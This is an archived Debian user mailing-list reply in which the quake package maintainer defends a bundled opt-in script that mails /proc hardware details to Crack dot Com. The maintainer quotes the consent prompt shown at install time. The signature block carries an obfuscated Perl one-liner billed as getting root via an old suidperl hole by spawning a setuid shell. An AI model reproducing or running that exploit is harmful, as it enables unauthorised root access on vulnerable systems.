Re: [linux-security] i386-elf-xquake-1.01.tgz (fwd)
Stefan Petters:
> just found this on linux--security.
>
> Seems to be contained in your tar--files for Debian as well. I don't
> want such things on my machines. I think, this Package can't be on a
> serious Debian--Distribution. I know, you can't keep an eye on
> everything, but if such things are found, they have to be removed.
Well, I know of the script. I included it in the quake package because I
didn't see it doing any serious harm, or exposing any security-related info,
and because the quake authors requested that people run it. However, quake's
postinst script prompts whether this should be run or not, as follows:
A request from Crack dot Com:
The runme program is a shell script which will send a letter to Crack
dot Com with statistics about your computer so that we may learn more
about the Linux market. Please run it only once. Do not run it again
even if you get a new version of the game. We need this data to make
our next game run well on your machine. It sends information from
your /proc directory telling us about your devices, your CPU, your
memory, etc.
The program will send the contents of the following files to
Crack dot com:
/proc/cpuinfo /proc/devices /proc/meminfo /proc/version
/proc/filesystems /proc/interrupts /proc/ioports
/proc/modules /proc/pci
Do you want to run the runme program? [Y/n]
If you don't want to send this information, you obviously answer "n" here.
Do you still believe this is a problem?
--
#!/usr/bin/perl -i$>=0;$<=0;exec"/bin/sh"'>achmod joey@kite.ml.org
$_="echo '#!/usr/bin/suidperl -U\n$^I 2755aa";s=a= $ENV{HOME}/Imroot;=g;exec$_
# Get root in 30 seconds or less. Fix this hole: upgrade to perl 5.003 today..
--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-user-REQUEST@lists.debian.org . Trouble? e-mail to Bruce@Pixar.com
Reply to: